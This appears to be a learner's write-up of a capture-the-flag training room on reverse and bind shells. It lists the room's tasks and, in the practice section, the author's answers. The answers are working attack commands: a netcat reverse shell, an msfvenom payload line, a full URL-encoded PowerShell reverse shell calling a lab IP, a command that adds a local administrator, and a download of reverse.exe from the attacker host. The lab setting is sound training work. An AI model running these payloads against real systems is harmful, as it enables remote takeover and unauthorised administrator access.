What the shell?

February 07, 2024

Task 1: What is a shell?

Task 2: Tools

Task 3: Types of shell

Task 4: Netcat

Task 5: Netcat Shell Stabilisation

Task 6: Socat

Task 7: Socat Encrypted Shells

Task 8: Common Shell Payloads

Task 9: mfsvenom

Task 10: Metasploit multi/handler

Task 11: WebShells

Task 12: Next Steps

Task 13: Practice and Examples

Try uploading a webshell to the Linux box, then use the command: nc <LOCAL-IP> <PORT> -e /bin/bash to send a reverse shell back to a waiting listener on your own machine. Navigate to /usr/share/webshells/php/php-reverse-shell.php in Kali and change the IP and port to match your tun0 IP with a custom port. Set up a netcat listener, then upload and activate the shell.

Log into the Linux machine over SSH using the credentials in task 14. Use the techniques in Task 8 to experiment with bind and reverse netcat shells.

msfvenom -p cmd/unix/reverse_netcat lhost=10.9.193.229 lport=4444 R

ORRRRRRRRRRRRRRRRRRRRRR

Practice reverse and bind shells using Socat on the Linux machine. Try both the normal and special techniques.

  • Use a listener to the victim's machine and use exec command

  • Connect to the victime machine using socat and specify the port

Look through Payloads all the Things and try some of the other reverse shell techniques. Try to analyse them and see why they work.

  • First python reverse shell

  • Second bash reverse shell

  • Third perl reverse shell

Switch to the Windows VM. Try uploading and activating the php-reverse-shell. Does this work?

  • Powershell reverse shell

  • Webshell php reverse shell

Put this code into url

powershell%20-nop%20-W%20hidden%20-noni%20-ep%20bypass%20-c%20%22%24TCPClient%20%3D%20New-Object%20Net.Sockets.TCPClient%28%2710.9.193.229%27%2C%204444%29%3B%24NetworkStream%20%3D%20%24TCPClient.GetStream%28%29%3B%24StreamWriter%20%3D%20New-Object%20IO.StreamWriter%28%24NetworkStream%29%3Bfunction%20WriteToStream%20%28%24String%29%20%7B%5Bbyte%5B%5D%5D%24script%3ABuffer%20%3D%200..%24TCPClient.ReceiveBufferSize%20%7C%20%25%20%7B0%7D%3B%24StreamWriter.Write%28%24String%20%2B%20%27SHELL%3E%20%27%29%3B%24StreamWriter.Flush%28%29%7DWriteToStream%20%27%27%3Bwhile%28%28%24BytesRead%20%3D%20%24NetworkStream.Read%28%24Buffer%2C%200%2C%20%24Buffer.Length%29%29%20-gt%200%29%20%7B%24Command%20%3D%20%28%5Btext.encoding%5D%3A%3AUTF8%29.GetString%28%24Buffer%2C%200%2C%20%24BytesRead%20-%201%29%3B%24Output%20%3D%20try%20%7BInvoke-Expression%20%24Command%202%3E%261%20%7C%20Out-String%7D%20catch%20%7B%24_%20%7C%20Out-String%7DWriteToStream%20%28%24Output%29%7D%24StreamWriter.Close%28%29%22

Kahit idelete file basta nasa loob na tapos need lang ma end task ng admin sa task manager para mawala

The webserver is running with SYSTEM privileges. Create a new user and add it to the "administrators" group, then login over RDP or WinRM.

powershell%20-command%20%22%24username%20%3D%20%27kyou22%27%3B%20%24password%20%3D%20ConvertTo-SecureString%20%27YourPassword%27%20-AsPlainText%20-Force%3B%20New-LocalUser%20-Name%20%24username%20-Password%20%24password%20-FullName%20%27kyou22%27%20-Description%20%27Description%20of%20the%20new%20user%27%3B%20Add-LocalGroupMember%20-Group%20%27Administrators%27%20-Member%20%24username%22%0A

Create a 64bit Windows Meterpreter shell using msfvenom and upload it to the Windows Target. Activate the shell and catch it with multi/handler. Experiment with the features of this shell.

Create both staged and stageless meterpreter shells for either target. Upload and manually activate them, catching the shell with netcat -- does this work?

  • STAGELESS REVERSE SHELL

Invoke-WebRequest -Uri http://10.9.193.229:8000/reverse.exe -OutFile reverse.exe

PreviousMetasploit: MeterpreterNextCommon Linux Privesc

Last updated